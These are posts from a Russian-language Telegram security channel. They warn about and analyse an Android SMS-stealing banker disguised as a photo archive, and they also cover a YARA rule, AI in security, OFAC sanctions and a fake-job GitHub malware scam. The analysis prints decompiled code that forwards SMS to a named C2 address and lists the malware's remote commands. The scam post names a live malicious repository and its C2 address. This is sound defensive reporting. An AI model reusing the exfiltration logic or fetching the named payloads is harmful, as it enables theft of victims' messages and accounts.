Хороший блог с хорошими статьями по анализу малвари: https://exploitreversing.com/
#почитать #реверсинг
#почитать #реверсинг
Exploit Reversing
A blog about vulnerability research, exploit development and reverse engineering.
👍1
Давно ожидаемое в том числе и нами набирает обороты. В отрасли ИБ тоже. Дальше будет веселее. Уже сейчас некоторые модели неплохо справляются в том числе с задачами реверсинга и поиска уязвимостей. Всё, что можно автоматизировать, будет автоматизировано. Как в нападении, так и в защите. Тем, кто учится на ИБ-специальностях сейчас, нужно учитывать этот долгий тренд и уметь как работать с моделями, так и понимать в общих чертах, что там под капотом. Хорошо, что мы давно делаем ставку на автоматизацию и ИИ: развиваем и усиливаем нашу команду ИИ, разрабатываем и внедряем новые модели.
Выше публиковали список интересных работ про ИИ в области ИБ. Не лишним будет напомнить.
#ии
Выше публиковали список интересных работ про ИИ в области ИБ. Не лишним будет напомнить.
#ии
CNews.ru
Российские ИТ-компании повально закрывают вакансии программистов. Это новый многолетний тренд - CNews
В России ИТ-компании начали частично замещать ИТ-специалистов искусственным интеллектом и перестали пытаться найти живых ИТ-шников, коих в стране катастрофический дефицит. Количество открытых...
👍3
Мошенническая активность
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том числе и от хорошо знакомых людей или родственников. Если пользователь установит его на свой смартфон, то злоумышленники смогут получать, читать, отправлять СМС-сообщения, получат доступ к контактам, смогут совершать звонки по мобильной связи. Это приведёт к краже аккаунтов, доступу к банковским счетам жертвы.
Расскажите близким людям, что, если вложение требует установки чего-то, а на устройстве появляются предупреждающие сообщения, как на скриншоте, то это вредоносная активность и устанавливать ничего не нужно.
Подробный анализ будет позже.
IP-адрес командного центра вредоносного приложения: 89.23.102.250
Общение с ним осуществляется по протоколу WebSocket
#offensive #malware #фишинг
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том числе и от хорошо знакомых людей или родственников. Если пользователь установит его на свой смартфон, то злоумышленники смогут получать, читать, отправлять СМС-сообщения, получат доступ к контактам, смогут совершать звонки по мобильной связи. Это приведёт к краже аккаунтов, доступу к банковским счетам жертвы.
Расскажите близким людям, что, если вложение требует установки чего-то, а на устройстве появляются предупреждающие сообщения, как на скриншоте, то это вредоносная активность и устанавливать ничего не нужно.
Подробный анализ будет позже.
IP-адрес командного центра вредоносного приложения: 89.23.102.250
Общение с ним осуществляется по протоколу WebSocket
#offensive #malware #фишинг
👍3😱1🤨1
Как и обещали, подробности по мошеннической активности, о которой говорили ранее.
Итак, если пользователь согласится установить вредоносное приложение, Android выведет список разрешений, необходимых этому приложению для работы. Среди них доступ к камере, доступ к контактам, доступ к файлам, доступ к микрофону, доступ к СМС.
После запуска приложение инициирует подключение к С2-серверу, IP-адрес которого – 89.23.102.250 (общение происходит по протоколу WebSocket), и отправляет ему 3 пакета с информацией об устройстве, в которую входят модель, версия Android, тип подключения, название и идентификаторы вредоносного приложения, номер телефона и оператор мобильной связи жертвы, сохранённые СМС-сообщения с мобильного телефона жертвы, список установленных приложений с версиями пакетов и иконками.
Четвёртый пакет содержит команду серверу:
На что сервер отвечает:
Далее вредоносное приложение переходит в режим ожидания, в котором получает Ping-пакет, отвечает на него Pong и отправляет пакет с информацией об устройстве, в которую входят модель, версия Android, тип подключения.
Загрузив зараженный apk-файл в декомпилятор и открыв файл «AndroidManifest.xml», мы увидим, что данное приложение требует доступ к конфиденциальной информации пользователя, а именно:
• Получение, чтение и отправка СМС
• Доступ к телефонным звонкам
Ресиверы СМС и ММС :
#offensive #malware #фишинг
Итак, если пользователь согласится установить вредоносное приложение, Android выведет список разрешений, необходимых этому приложению для работы. Среди них доступ к камере, доступ к контактам, доступ к файлам, доступ к микрофону, доступ к СМС.
После запуска приложение инициирует подключение к С2-серверу, IP-адрес которого – 89.23.102.250 (общение происходит по протоколу WebSocket), и отправляет ему 3 пакета с информацией об устройстве, в которую входят модель, версия Android, тип подключения, название и идентификаторы вредоносного приложения, номер телефона и оператор мобильной связи жертвы, сохранённые СМС-сообщения с мобильного телефона жертвы, список установленных приложений с версиями пакетов и иконками.
Четвёртый пакет содержит команду серверу:
{"action":"retransmission"}На что сервер отвечает:
{"action": "retransmission", "number": "NUMBER"}Далее вредоносное приложение переходит в режим ожидания, в котором получает Ping-пакет, отвечает на него Pong и отправляет пакет с информацией об устройстве, в которую входят модель, версия Android, тип подключения.
Загрузив зараженный apk-файл в декомпилятор и открыв файл «AndroidManifest.xml», мы увидим, что данное приложение требует доступ к конфиденциальной информации пользователя, а именно:
• Получение, чтение и отправка СМС
<uses-permission
name="android.permission.RECEIVE_SMS" />
<uses-permission
name="android.permission.READ_SMS" />
<uses-permission
name="android.permission.SEND_SMS" />
• Доступ к телефонным звонкам
<uses-permission
name="android.permission.READ_PHONE_STATE" />
<uses-permission
name="android.permission.READ_PHONE_NUMBERS" />
<uses-permission
name="android.permission.READ_CALL_LOG" />
<uses-permission
name="android.permission.CALL_PHONE" />
Ресиверы СМС и ММС :
android:name="ru.cvv.core.SMSBroadcastReceiver"
permission="android.permission.BROADCAST_SMS"
exported="true"
android:tag="⟨STRING_DECODE_ERROR⟩">
<intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
<action
android:name="android.provider.Telephony.SMS_RECEIVED"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
<action
android:name="android.provider.Telephony.SMS_DELIVER"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
</intent-filter>
android:name="ru.cvv.core.MmsReceiver"
permission="android.permission.BROADCAST_WAP_PUSH"
exported="true"
android:tag="⟨STRING_DECODE_ERROR⟩">
<intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
<action
android:name="android.provider.Telephony.WAP_PUSH_DELIVER"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
<data
android:mimeType="application/vnd.wap.mms-message"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
</intent-filter>
#offensive #malware #фишинг
👍1
Продолжение
SMS-ресивер используется для обработки полученного СМС-сообщения на смартфоне и отправки его на командный сервер. Нагрузка находится в методе onReceive() класса SMSBroadcastReceiver:
Объект а реализует отправку полученного сообщения на С2-сервер:
MMS-ресивер в исследуемой версии никак не реализован:
WS-сервис
WebSocketService
Класс WebSocketService создан незаметно работать в фоне. При инициализации вызывает функцию create_realwebsocket ()
которая создает объект RealWebSocket(). Также этот класс реализует сбор информации с устройства.
Класс RealWebSocket осуществляет общение с С2 по протоколу WebSocket. Он получает от сервера сообщения и может отправлять свои. В методе connect() происходит создание класса MyWebSocketListener и вызов метода init_MyWebSocketListener(). MyWebSocketListener используется для создания собранной информации с устройства в пакет и последующей отправки на сервер.
Команды сервера
В методе onReadMessage() класса RealWebSocket заданы команды, которые необходимо выполнить при получении той или иной команды:
• send_call – на указанный в поле «number» полученной команды будет произведен звонок
• retransmission – на номер телефона, указанного в поле «number» будет отправлена СМС с содержимым переменных: unique_id;;worker;;worker_id
• send_sms – на указанный в поле «number» телефонный номер будет отправлен текст, содержащийся в «message»
• get_message_history – на сервер отправляются СМС, сохраненные на телефоне
• get_perm_list – на сервер отправляется список разрешений приложения
• get_app_list – отправляются установленные приложения
• get_calls_history – на сервер отправляет история звонков
• get_sim_list – на сервер отправляются номер телефона и сотовый оператор
Выводы
Совершенно очевидно, что данный экземпляр вредоносного приложения далеко не единственный. Это следует хотя бы из наличия нескольких идентификаторов вредоносной сборки, которая отправляется во втором пакете при старте вредоносного приложения:
• unique_id - уникальный id
• current_app - информация о текущем приложении:
◦ app_name
◦ worker
◦ worker_id
◦ webview_url
◦ build_type
Об этом же свидетельствует и наличие единcтвенного IP-адреса в экземпляре вредоноса: злоумышленники не хотят "палить" несколько серверов сразу. Им проще потерять один из C2-серверов вместе с привязанными к нему приложениями. Это говорит и о времени жизни атаки с использованием данного конкретного экземпляра вредоноса: оно невелико. Но экземпляров, судя по всему, немало, как и C2-серверов
#offensive #malware #фишинг
SMS-ресивер используется для обработки полученного СМС-сообщения на смартфоне и отправки его на командный сервер. Нагрузка находится в методе onReceive() класса SMSBroadcastReceiver:
. . .
new Thread(new a(i4, displayOriginatingAddress, sb2)).start(); // <- нагрузка
ContentValues contentValues = new ContentValues();
contentValues.put("address", displayOriginatingAddress);
contentValues.put("body", sb2);
contentValues.put("type", (Integer) 1);
contentValues.put("date", Long.valueOf(System.currentTimeMillis()));
. . .
Объект а реализует отправку полученного сообщения на С2-сервер:
. . .
if (MyWebSocketListener.f3863f != null) {
JSONObject jSONObject = new JSONObject();
jSONObject.put("action", "incoming");
jSONObject.put("sender", str);
jSONObject.put("body", str2);
jSONObject.put("subscription_id", i4);
MyWebSocketListener.f3863f.send(jSONObject.toString());
break;
MMS-ресивер в исследуемой версии никак не реализован:
public final void onReceive(Context context, Intent intent) {}WS-сервис
<service
name="ru.cvv.core.WebSocketService"
exported="false"
android:foregroundServiceType="dataSync"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
WebSocketService
Класс WebSocketService создан незаметно работать в фоне. При инициализации вызывает функцию create_realwebsocket ()
public final int onStartCommand(Intent intent, int i3, int i4) {
Log.d("WebSocketService", "Service onStartCommand");
. . .
create_realwebsocket();
return 1;
}которая создает объект RealWebSocket(). Также этот класс реализует сбор информации с устройства.
Класс RealWebSocket осуществляет общение с С2 по протоколу WebSocket. Он получает от сервера сообщения и может отправлять свои. В методе connect() происходит создание класса MyWebSocketListener и вызов метода init_MyWebSocketListener(). MyWebSocketListener используется для создания собранной информации с устройства в пакет и последующей отправки на сервер.
Команды сервера
В методе onReadMessage() класса RealWebSocket заданы команды, которые необходимо выполнить при получении той или иной команды:
• send_call – на указанный в поле «number» полученной команды будет произведен звонок
• retransmission – на номер телефона, указанного в поле «number» будет отправлена СМС с содержимым переменных: unique_id;;worker;;worker_id
• send_sms – на указанный в поле «number» телефонный номер будет отправлен текст, содержащийся в «message»
• get_message_history – на сервер отправляются СМС, сохраненные на телефоне
• get_perm_list – на сервер отправляется список разрешений приложения
• get_app_list – отправляются установленные приложения
• get_calls_history – на сервер отправляет история звонков
• get_sim_list – на сервер отправляются номер телефона и сотовый оператор
Выводы
Совершенно очевидно, что данный экземпляр вредоносного приложения далеко не единственный. Это следует хотя бы из наличия нескольких идентификаторов вредоносной сборки, которая отправляется во втором пакете при старте вредоносного приложения:
• unique_id - уникальный id
• current_app - информация о текущем приложении:
◦ app_name
◦ worker
◦ worker_id
◦ webview_url
◦ build_type
Об этом же свидетельствует и наличие единcтвенного IP-адреса в экземпляре вредоноса: злоумышленники не хотят "палить" несколько серверов сразу. Им проще потерять один из C2-серверов вместе с привязанными к нему приложениями. Это говорит и о времени жизни атаки с использованием данного конкретного экземпляра вредоноса: оно невелико. Но экземпляров, судя по всему, немало, как и C2-серверов
#offensive #malware #фишинг
Telegram
Рекриптор
Мошенническая активность
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
👍3
Были запросы хэша этого вредоноса. Ниже yara-правило. Хэш там тоже есть
#malware #offensive
import "hash"
rule photo_archive : banker {
meta:
author = "re-crypt"
strings:
$pk = { 50 4B }
$package_name = "ru.cvv.core" wide ascii
$str = "HIDDEN SMS " ascii
$apk_sig_v2 = {B4 80 8D D4 CF E0 37 7F 88 6F 7D 5E 6F 8E 8F 9D 39 B6 BD DF 09 11 A2 D0 BE 75 DC 67 8B 71 3E A5 0F 5C 3C AD BD 28 2D 67 6C A6 93 D4 1A 47 78 0A51 9F B6 69 83 F1 8B 9A 71 73 CA A2 E9 ED 04 20 15 63 BC 92 B5 58 77 B7 30 BF 1A A1 93 C2 EE 18 A9 95 77 7C B7 90 5B 6F 2B DF E4 DE 0D F1 33 25 56 17 1B A6 2E A8 4B 69 63 08 5E EB 4F A2 DE 01 A6 54 71 84 03 BB 06 50 15 EC 92 5A AA 7C EA 6C A7 35 21 37 22 74 C1 33 0F D8 B9 EE 9A 5C 29 D2 FC 5E 02 28 C2 A9 CA F1 AF 35 FD 37 A3 D4 97 10 9C FC 01 19 75 93 48 6B 6F 3D B8 CD 8B 9B E1 1E DB 8B 95 88 E1 09 D6 87 31 92 0C 92 50 BB 03 E6 62 18 47 48 B2 0F 4A 7B 82 44 ED 63 99 0B 9A C3 75 80 A7 02 DF 2A BE C1 4A E5 4A 0F 96 D5 19 F5 EF 66 A3 95 CC 8E B9 C6 9D 09 EF 13 EA 41 46 04 89 C0 69 0D 8D 72 7E 4C 9A BD 04 FB DA C3 F2 3D }
$apk_sig_v3 = {2F FF C8 AF 00 70 ED A0 90 B3 1D FC 5D FF 59 EC B8 F6 6A 0E 68 B4 E8 D5 92 6F 1E F7 44 A6 F5 51 C0 E0 BD 46 CC 7E 6F 9C 40 12 7F ED D3 CB 4D B6 0E BA B3 83 4C D5 3B 5B BD DF 60 FB C7 E9 B8 D5 E7 81 63 D0 6F BC 07 2D 79 A1 84 60 40 53 85 97 83 04 54 68 C0 AA B1 5B 4D 0E DC 29 32 63 D4 36 E5 DB 58 A7 0A A9 F0 3C 53 87 65 1C 81 F5 22 8E 9B 5C 6D FB F0 CF 24 36 98 B9 C8 D6 6B 88 DB 53 D2 35 CE 17 83 5C AF 86 0E 41 6D 9C C5 F6 09 18 EF DC 7C 4D 4B 28 3E E8 31 4B 9F 20 55 63 5A 2F FE 81 03 E3 26 DA 1F 74 80 61 83 5F 8B D2 CA FD 5A 18 99 78 BE B7 6C CC 56 F9 5A 4C 86 71 4A B9 67 1B A5 3D E0 74 02 49 32 AC 89 D9 CA 9B A3 60 BE 78 7A 19 26 77 0E EF B7 E8 88 5C A9 EA 52 E8 69 FB 8E 13 1D 51 BB 70 5E BD DE 9B 37 77 DC 9A 2C E1 E1 E9 7D 01 3F 9C 80 D9 E8 20 FC 16 7C 82}
condition:
($pk at 0 and 2) and
(hash.sha256(0,filesize) == "8b075beae0b294b158fcea470a28c72378c32e217c5548fdcce1fbc152a396c5" or
($package_name and
$str and
$apk_sig_v2 and
$apk_sig_v3))
}
#malware #offensive
Telegram
Рекриптор
Мошенническая активность
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том…
👍4
Про DeepSeek
Все побежали - и я побежал (c)
Раз все (ну почти) пишут про DeepSeek, мы тоже напишем. Нам интересно порассуждать, как повлияет его появление на ИБ. Тему эту мы буквально вчера в разных узких кругах затрагивали несколько раз. Тема актуальная. Лично я считаю, всё уже случилось: сильный генеративный ИИ уже давно оказывает влияние на ИБ. Сейчас появился ещё один довольно крутой и, самое главное, доступный инструмент, который несколько лучше, на мой субъективный взгляд, чем GPT-4. Его появление ускорит уже идущие трансформации, основной тренд которых - максимальная автоматизация с одновременным ускорением всех процессов.
Если говорить про offensive security, то это автоматизация поиска уязвимостей, проникновения, закрепления, дальнейшего продвижения, получения доступа, автоматическое генерирование эксплоитов, нагрузок, троянских программ, парсеров данных и т.д. Список далеко не полный, но масштаб понятен. То, что до появления GPT-моделей делалось за дни, теперь занимает минуты. Сгенерировать заобфусцированный троян с возможностью скачивания нагрузки, проверки её подлинности и запуска на исполнение, например, на Python - 50 секунд. И он вполне работоспособен. Злоумышленников не сковывают нормы регуляторов и прочие подобные ограничения, поэтому технологии ИИ внедряются ими максимально широко и эффективно. Это уже происходит. Мы об этом много писали. Можно найти по тэгам #ии #offensive
В защите ИИ внедряется для выявления аномалий (это тоже уже давно с переменным успехом, но сейчас идёт уверенный рост) в анализируемых объектах и в их поведении, при анализе вредоносной активности и вредоносных сущностей. Автоматизируется солидная часть работы вирусных аналитиков, сотрудников SOC-центров. Мы писали об этом. Разработчики средств защиты тоже используют кодогенерацию с помощью ИИ. Это уже норма. Но, в силу организационных причин, их код внедряется не так быстро. Это может привести к запоздалым реакциям на угрозы.
Так сложилось исторически, что мы изначально при создании нашей антивирусной лаборатории сделали ставку на ИИ и максимальную автоматизацию нашей деятельности. Мы используем несколько разных моделей разной сложности, включая локально развёрнутые большие языковые модели (LLM). Часть моделей мы разработали и обучили сами. Продолжаем их совершенствовать и разрабатывать новые. Вся деятельность компании Рекрипт пронизана ИИ: от видеоаналитики до кодогенерации и анализа вредоносов. Здесь хочется сказать огромное спасибо нашим друзьям и партнёрам - компании HPC Park - за предоставленные мощности и безупречный сервис.
#ии
Все побежали - и я побежал (c)
Раз все (ну почти) пишут про DeepSeek, мы тоже напишем. Нам интересно порассуждать, как повлияет его появление на ИБ. Тему эту мы буквально вчера в разных узких кругах затрагивали несколько раз. Тема актуальная. Лично я считаю, всё уже случилось: сильный генеративный ИИ уже давно оказывает влияние на ИБ. Сейчас появился ещё один довольно крутой и, самое главное, доступный инструмент, который несколько лучше, на мой субъективный взгляд, чем GPT-4. Его появление ускорит уже идущие трансформации, основной тренд которых - максимальная автоматизация с одновременным ускорением всех процессов.
Если говорить про offensive security, то это автоматизация поиска уязвимостей, проникновения, закрепления, дальнейшего продвижения, получения доступа, автоматическое генерирование эксплоитов, нагрузок, троянских программ, парсеров данных и т.д. Список далеко не полный, но масштаб понятен. То, что до появления GPT-моделей делалось за дни, теперь занимает минуты. Сгенерировать заобфусцированный троян с возможностью скачивания нагрузки, проверки её подлинности и запуска на исполнение, например, на Python - 50 секунд. И он вполне работоспособен. Злоумышленников не сковывают нормы регуляторов и прочие подобные ограничения, поэтому технологии ИИ внедряются ими максимально широко и эффективно. Это уже происходит. Мы об этом много писали. Можно найти по тэгам #ии #offensive
В защите ИИ внедряется для выявления аномалий (это тоже уже давно с переменным успехом, но сейчас идёт уверенный рост) в анализируемых объектах и в их поведении, при анализе вредоносной активности и вредоносных сущностей. Автоматизируется солидная часть работы вирусных аналитиков, сотрудников SOC-центров. Мы писали об этом. Разработчики средств защиты тоже используют кодогенерацию с помощью ИИ. Это уже норма. Но, в силу организационных причин, их код внедряется не так быстро. Это может привести к запоздалым реакциям на угрозы.
Так сложилось исторически, что мы изначально при создании нашей антивирусной лаборатории сделали ставку на ИИ и максимальную автоматизацию нашей деятельности. Мы используем несколько разных моделей разной сложности, включая локально развёрнутые большие языковые модели (LLM). Часть моделей мы разработали и обучили сами. Продолжаем их совершенствовать и разрабатывать новые. Вся деятельность компании Рекрипт пронизана ИИ: от видеоаналитики до кодогенерации и анализа вредоносов. Здесь хочется сказать огромное спасибо нашим друзьям и партнёрам - компании HPC Park - за предоставленные мощности и безупречный сервис.
#ии
Telegram
Рекриптор
Давно ожидаемое в том числе и нами набирает обороты. В отрасли ИБ тоже. Дальше будет веселее. Уже сейчас некоторые модели неплохо справляются в том числе с задачами реверсинга и поиска уязвимостей. Всё, что можно автоматизировать, будет автоматизировано.…
👍9🔥4👏1
Приехала в бумажном виде. Так читать всё-таки удобнее. Книга довольно содержательная и даёт ответы на вопросы "Почему именно так, а не иначе". Это тот самый вероятностный подход к машинному обучению. Фраза "машинное обучение " не должна смущать. В книге детально рассмотрены и трансформеры, и GPT: обоснование создания этих моделей. Есть довольно подробные главы, посвящённые сугубо теории вероятности, статистике, теории информации, линейной алгебре с упором на применение этих дисциплин в машинном обучении. В общем, рекомендуем к прочтению
#ии #почитать
#ии #почитать
Интересный документ есть в Сети про санкции и open source. В частности, про санкции U.S. OFAC (Office of Foreign Assets Control). Не люблю всякое такое, но в данном случае, на мой взгляд, эти явления окажут серьёзное влияние и на развитие open source, и на безопасность. Приведу выдержки из документа с небольшими комментариями.
Незнание не освобождает от террора. Слово ответственность мне здесь кажется не очень уместным. Террор лучше подходит.
Здесь говорится буквально, что довольно сложно, и даже невозможно, понять, находится ли лицо, с которым взаимодействует разработчик, под санкциями или нет. Но, если их нарушить, то будут последствия, включая уголовные наказания:
При этом спектр людей и организаций, попадающих под эти "правила" достаточно широк:
Как это относится к open source:
Т.е. обсудил улучшение открытого софта с неправильными людьми - рискуешь попасть на штрафы или даже присесть. Многие ли продолжат дальше коммуницировать при таких угрозах - вопрос.
The OFAC sanctions rules are “strict liability”, which means it does not matter whether you know about them or not. Violating these rules can lead to serious penalties, so it's important to understand how they might affect your open source work
Незнание не освобождает от террора. Слово ответственность мне здесь кажется не очень уместным. Террор лучше подходит.
For developers, this means you need to be cautious about who you interact with and where your contributions come from. OFAC sanctions can target specific countries, regions, and individuals or organizations, with many of the individuals and organizations listed on the Specially Designated Nationals and Blocked Persons (“SDN”) List. OFAC updates this list regularly, adding or removing names as global situations change. OFAC sanctions also apply to all entities that are owned 50% or more directly or indirectly by one or more SDN individuals or entities, whether or not the owned entity shows up on the SDN List. Some entities, such as entities owned or controlled by OFAC-sanctioned governments, may also be sanctioned but not included on the SDN List. In addition, the few comprehensively sanctioned governments, regions, and countries also are not included on the SDN List.
Здесь говорится буквально, что довольно сложно, и даже невозможно, понять, находится ли лицо, с которым взаимодействует разработчик, под санкциями или нет. Но, если их нарушить, то будут последствия, включая уголовные наказания:
Violating these sanctions can result in serious consequences, including large civil fines and criminal penalties.
При этом спектр людей и организаций, попадающих под эти "правила" достаточно широк:
In general, if you’re a U.S. citizen or a U.S.-based organization, or if you deal with U.S.-origin goods, services, or U.S. Dollars for prohibited transactions, you’re likely required to follow these rules, no matter where in the world you are.
Как это относится к open source:
The OFAC sanctions may impact common community behaviors, such as two-way collaboration on a proposed software change which could be interpreted as a prohibited provision of services.
Т.е. обсудил улучшение открытого софта с неправильными людьми - рискуешь попасть на штрафы или даже присесть. Многие ли продолжат дальше коммуницировать при таких угрозах - вопрос.
Продолжение
Если "неправильные" люди нашли ошибку в открытом софте, то взаимодействовать с ними предлагается буквально следующим образом:
Ну т.е. давай патчи и вали, нам запрещено с тобой разговаривать. Учитывая, что определить, можно разговаривать или нельзя, не так то просто, общаться, подозреваю, перестанут со всеми подозрительными. Чтобы не было чего. Проблемы никому не нужны. Тот же смысл у этой цитаты:
Давай патч и проваливай. Многие ли будут помогать раскалывающемуся сообществу в таких условиях - вопрос, на мой взгляд, риторический.
Нет, поддержку вашего железа мы добавлять не будем:
Ну и про права тоже надо забыть:
С информационной безопасностью здесь связь прямая. При таких раскладах и отношениях репортить разработчикам открытых продуктов об уязвимостях глубокого смысла нет, как и в целом участвовать в развитии этих продуктов в рамках исходных основных веток. Те, кого ограничения ещё не коснулись, мотают на ус и задаются вопросом, а стоит ли участвовать в общем или лучше делать своё? Таким образом некогда достаточно единые сообщества раскалываются, что ведёт к ухудшению качества продуктов в основных ветках и куче небезопасных форков. В общем, выстрел в ногу, как по мне
Если "неправильные" люди нашли ошибку в открытом софте, то взаимодействовать с ними предлагается буквально следующим образом:
In a simple example, if an SDN identified a memory bug and submitted an unsolicited patch to fix the issue, developers receiving this patch should be able to evaluate the patch on its technical merit, modify it if they see fit, and apply the patch to their repository. The SDN’s developer submitting the patch would see the patch being applied but should not be engaged in a two-way communication discussing the patch, the technical merits, or ways to improve the patch. The source code itself is informational material, but the concern is a developer crossing a line into providing a service to the SDN.
Ну т.е. давай патчи и вали, нам запрещено с тобой разговаривать. Учитывая, что определить, можно разговаривать или нельзя, не так то просто, общаться, подозреваю, перестанут со всеми подозрительными. Чтобы не было чего. Проблемы никому не нужны. Тот же смысл у этой цитаты:
Reviewing an unsolicited patch from a contributor in a sanctioned region should generally be fine, but actively engaging them to better understand their issue, diagnose the problem, or help improve a patch or modify code would likely cross the line. If the contributor is linked to a sanctioned entity or region, in general, it is best to keep communications strictly one-way. If a patch is received and you improve it and submit it upstream, that should be fine, but going back and forth in communications with the SDN developer likely would not.
Давай патч и проваливай. Многие ли будут помогать раскалывающемуся сообществу в таких условиях - вопрос, на мой взгляд, риторический.
Нет, поддержку вашего железа мы добавлять не будем:
Accepting unsolicited patches that fix general issues in your open source project should be okay. However, if the changes directly benefit a restricted party’s products or services, it could be a problem. For example, if a developer from AcmeSDN (and AcmeSDN is an SDN subject to OFAC sanctions) contributes a driver that enables the AcmeSDN processor to work in your software, that contribution would likely be an issue. Think carefully not just about the source code, but the impact of these unsolicited patches.
Ну и про права тоже надо забыть:
Many open source projects require a CLA, which would bar contributors from OFAC sanctioned entities. OFAC sanctions bar transacting in intellectual property, and specifically, any agreement in intellectual property or any other contract with an SDN. If your open source project requires a CLA, make sure your CLA validation process includes compliance checks against the SDN List.
С информационной безопасностью здесь связь прямая. При таких раскладах и отношениях репортить разработчикам открытых продуктов об уязвимостях глубокого смысла нет, как и в целом участвовать в развитии этих продуктов в рамках исходных основных веток. Те, кого ограничения ещё не коснулись, мотают на ус и задаются вопросом, а стоит ли участвовать в общем или лучше делать своё? Таким образом некогда достаточно единые сообщества раскалываются, что ведёт к ухудшению качества продуктов в основных ветках и куче небезопасных форков. В общем, выстрел в ногу, как по мне
www.linuxfoundation.org
Navigating Global Regulations and Open Source: US OFAC Sanctions
Learn how U.S. OFAC sanctions impact global open source collaboration. Understand compliance, regulations, and strategies to navigate these complex legal frameworks responsibly with insights from The Linux Foundation.
👍2
Хорошая серия про механизмы закрепления в Linux и обнаружение малвари
https://www.elastic.co/security-labs/primer-on-persistence-mechanisms
https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms
#linux #malware #offensive
https://www.elastic.co/security-labs/primer-on-persistence-mechanisms
https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms
#linux #malware #offensive
www.elastic.co
Linux Detection Engineering - A primer on persistence mechanisms — Elastic Security Labs
In this second part of the Linux Detection Engineering series, we map multiple Linux persistence mechanisms to the MITRE ATT&CK framework, explain how they work, and how to detect them.
Свежая статья про возможности PowerShell, выполнение скриптов в памяти, обход AMSI, обфускацию скриптов. Red Team-ерам, пентестерам и просто интересующимся полезно: https://medium.com/@0xHossam/powershell-exploits-modern-apts-and-their-malicious-scripting-tactics-7f98b0e8090c
#offensive
#offensive
Medium
PowerShell Exploits — Modern APTs and Their Malicious Scripting Tactics
Hi in this blog we’ll start with an introduction to PowerShell, explaining why it’s a favorite tool for red teamers. From there, we’ll…
👍4
Ещё одна мошенническая активность, направленная на соискателей. Банда шахматистов
В этот раз мошенники, мимикрирующие под работодателя, ищут ни много ни мало аж целого Project Manager-а. Проект, над которым предлагается работать соискателю, кто бы сомневался, в области блокчейн. Говорят, хотят к шахматам его прикрутить. Общую схему мы уже описывали в цикле постов, она практически та же самая: находят потенциальную жертву через Linkedin, предлагают пройти собеседование, дают ссылку на проект (на этот раз в github), потенциальная жертва запускает его у себя, мошенники просят "расшарить" экран (очевидно, чтобы отслеживать и корректировать действия жертвы, имея при этом возможность визуально контролировать, в какой среде выполняется вредоносный код, и не имитируют ли жертву аналитики, пытаясь получить побольше информации о мошеннической группировке).
При запуске вредоносного кода происходит утечка данных криптокошельков, паролей и доступов к различным аккаунтам. Также скачиваются разного рода нагрузки (на Python, злоумышленники его очень любят, потому что антивирусы с ним плохо умеют работать, как и со всеми скриптовыми языками), позволяющие надёжнее закрепиться в системе жертвы и, в идеале, получить полный контроль над ней.
Из относительно интересного: вредонос старается определить, что работает в виртуальной машине (например, в песочнице) или под отладчиком. В этом случае он просто завершается и дальнейшее развитие атаки не производится.
Мошенники не обращают внимание на юрисдикции и гражданства, работая "широким гребнем". По гражданам России тоже работают. Скам - интенсивно развивающаяся международная угроза с постоянно растущим оборотом и относительно невысокими рисками для злоумышленников. Обложка журнала The Economist к этому посту от 8 февраля 2025 года об этом говорит.
Фишинговый аккаунт на github: https://github.com/wenode1002
Репозиторий с вредоносным кодом называется chess. Вредоносный имплант находится в единственном файле HEAD по этому пути: https://github.com/wenode1002/chess/tree/main/.github/logs/refs/heads/.DS_Store/
Имплант - это заобфусцированный дроппер, который обращается по адресу 94.131.107.227:1224
Следует отметить, что этот репозиторий эпизодически пропадает, а потом появляется вновь. Злодеи стараются максимально долго не спалить инструментарий, аккаунт, IP-адреса. Логично.
Наши выводы совпадают с теми, что мы делали ранее. Инструменты мошенников, следует отметить, становятся технологичнее. Сами мошенники работают изощреннее, профессиональнее и осторожнее. Забавно, что при лёгкой модификации (добавление пробела в ничего не значащее место) вредоносный имплант перестаёт обнаруживаться некоторыми чрезвычайно популярными антивирусами (на момент анализа нами так было). Не просто сигнатурным поиском, что было бы логично, но эвристическими движками🤦♂️ . Всё-таки антивирусная отрасль отстаёт всё сильнее от работников скрипта и топора :) Целями являются как пользователи Linux, так и пользователи Windows.
#фишинг #offensive #malware
В этот раз мошенники, мимикрирующие под работодателя, ищут ни много ни мало аж целого Project Manager-а. Проект, над которым предлагается работать соискателю, кто бы сомневался, в области блокчейн. Говорят, хотят к шахматам его прикрутить. Общую схему мы уже описывали в цикле постов, она практически та же самая: находят потенциальную жертву через Linkedin, предлагают пройти собеседование, дают ссылку на проект (на этот раз в github), потенциальная жертва запускает его у себя, мошенники просят "расшарить" экран (очевидно, чтобы отслеживать и корректировать действия жертвы, имея при этом возможность визуально контролировать, в какой среде выполняется вредоносный код, и не имитируют ли жертву аналитики, пытаясь получить побольше информации о мошеннической группировке).
